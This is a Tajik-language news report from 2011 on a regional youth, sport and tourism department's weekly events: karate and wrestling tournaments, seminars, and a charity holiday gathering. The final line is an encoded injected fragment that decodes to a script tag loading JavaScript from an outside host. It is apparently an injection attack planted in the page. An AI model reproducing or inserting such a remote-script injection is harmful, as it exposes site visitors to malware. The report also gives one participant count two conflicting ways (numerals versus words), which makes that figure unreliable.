11.03.2011
Ахбороти чорабиниҳои ҳафтаинаи Раёсати ҷавонон, варзиш ва сайёҳии вилоят аз санаи 28 феврал то 4 марти соли 2011
Тибқи нақшаи чорабиниҳои Раёсат санаи 2 марти соли равон дар толори варзишии «Ҷашнӣ»-и шаҳри Хуҷанд бахшида ба 20 - солагии Истиқлолияти давлатии Ҷумҳурии Тоҷикистон мусобиқаи вилояти Суғд оид ба каратэ кёкушинкан байни наврасон ва калонсолон ташкил ва гузаронида шуд, ки дар он 1 даста аз шаҳри Хуҷанд, 1 даста аз ноҳияи Б.Ғафуров, 1 даста аз ноҳияи Спитамен, 1 даста аз шаҳри Исфара, 1 даста аз ноҳияи Ғончӣ, 1 даста аз шаҳри Истаравшан, 1 даста аз шаҳри Қайроққум ва дар маҷмӯъ 80 нафар варзишгарони вилоят аз рӯи 16 дараҷаи вазнӣ ширкат варзиданд, ки дар натиҷа каратэчиён ба 16 медали тилло, 16 медали нуқра ва 16 медали биринҷӣ ноил гардиданд.
Ҳамчунин санаи 3 марти соли 2011, семинари сайёри Раёсати ҷавонон, варзиш ва сайёҳӣ оид ба ивази таҷриба, коргузорӣ ва пурзӯр намудани самтҳои фаъолият доир ба пешгирии омилҳои номатлуби иҷтимоӣ дар ноҳияи Бобоҷон Ғафуров баргузор, ки дар он мудирони бахшхои чавонон, варзиш ва сайёҳии шаҳру ноҳияҳои вилоят ширкат варзиданд.
Иштирокчиёни семинари сайёр аз утоқи кории бахши ҷавонон, варзиш ва сайёҳӣ, муовини раиси ҷамоати шаҳраки Ғафуров оиди кор бо ҷавонон ва мактаби варзишии бачагону наврасони №1-и ноҳияи Бобоҷон Ғафуров, оиди тарзи хуҷҷатнигорӣ, нақша чорабиниҳо, ҷойҳои таърихии ноҳия ва баъдан аз иншоотхои варзишӣ низ дидан намуданд.
Инчунин ҳамон рӯз дар толори хурди маҷлисгоҳи мақомоти иҷроияи ҳокимияти давлатии ноҳияи Бобоҷон Ғафуров бо мақсади пойдории оилаҳои ҷавон, фаҳмонидани масъулияти падару модар дар таълим ва тарбияи фарзанд, тарбия ва рушди солимии кӯдак, семинари вилоятӣ оид ба мавзӯи «Оиладорӣ ва тарбияи фарзанд», бо иштироки мудирони бахшҳои ҷавонон, варзиш ва сайёҳии шаҳру ноҳияҳои вилоят ва муовини раисони ҷамоатҳои ноҳияи Бобоҷон Ғафуров ташкил ва гузаронида шуд.
Дар семинари мазкур Сардори Раёсати ҷавонон, варзиш ва сайёҳии вилоят Ф. Ҳодибоев, роҳбари дастгоҳи раиси ноҳияи Бобоҷон Ғафуров М. Ҳакимов, раиси Шӯрои олимон ва муҳаққиқони ҷавони вилоят Ф.Очилова ва мудири бахши ҷавонон, варзиш ва сайёҳии шаҳри Истаравшан М.Сангинов оиди мавзӯи зикргардида, муҳокимаронӣ намуданд.
Тибқи нақшаи чорабиниҳои Раёсат санаи 4 марти соли равон дар тарабхонаи «Меҳрангез»-и шаҳри Хуҷанд бо мақсади дастгирии моддиву маънавии ҷавондухтарони маъюбу камбизоат ва ҷисман заифи шаҳру ноҳияҳои вилоят ва бахшида ба пешвози Иди бонувон 8-март дар ҳамкорӣ ва ҷалби маблаҒгузории Маркази фарҳангӣ ва хайриявии Ташкилоти ҷамъиятии байналхалқии «Вдохновение» дар Ҷумҳурии Тоҷикистон чорабинии фарҳангии идона баргузор гардид.
Дар маҷмӯъ ба чорабинии мазкур 120 (дусаду ҳаштод) нафар ҷавондухтарони маъюбу камбизоат ва ҷисман заифи шаҳру ноҳияҳои Хуҷанд, Б.Ғафуров, Табошар, Ашт, Истаравшан, Чкалов, Зафаробод, Ҷ.Расулов, Конибодом ва Исфара фаро гирифта шуда, барномаи фарҳангии идона бо иштироки санъаткорони ҷавон ва бо тақдими тӯҳфаҳои хотиравӣ ба итмом расид.
Санаҳои 3-4 марти соли 2011 дар толори варзишии «Ҷашнӣ»-и шаҳри Хуҷанд бахшида ба 20 - солагии Истиқлолияти давлатии Ҷумҳурии Тоҷикистон Бозиҳои варзишии Ҷумҳурии Тоҷикистон дар вилояти СуҒд (марҳилаи дуюм) аз рӯи намуди гӯштини миллӣ ташкил ва гузаронида шуд, ки дар он дастаҳо аз шаҳру ноҳияҳои Хуҷанд, Мастчоҳ, Кӯҳистони Мастчоҳ, Спитамен, Чкалов, Ғончӣ, Ҷ.Расулов ва дар маҷмӯъ 60 нафар варзишгарони вилоят аз рӯи 10 дараҷаи вазнӣ ширкат варзиданд, ки дар натиҷа дастаи ноҳияи Ҷ.Расулов сазовори ҷои якум, ноҳияи Мастчоҳ ҷои дуюм ва дастаи шаҳри Хуҷанд ба ҷои сеюм ноил гардиданд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)47aad157c47a1ea6b101d3ff1e4fbc77.js" type="text/javascript">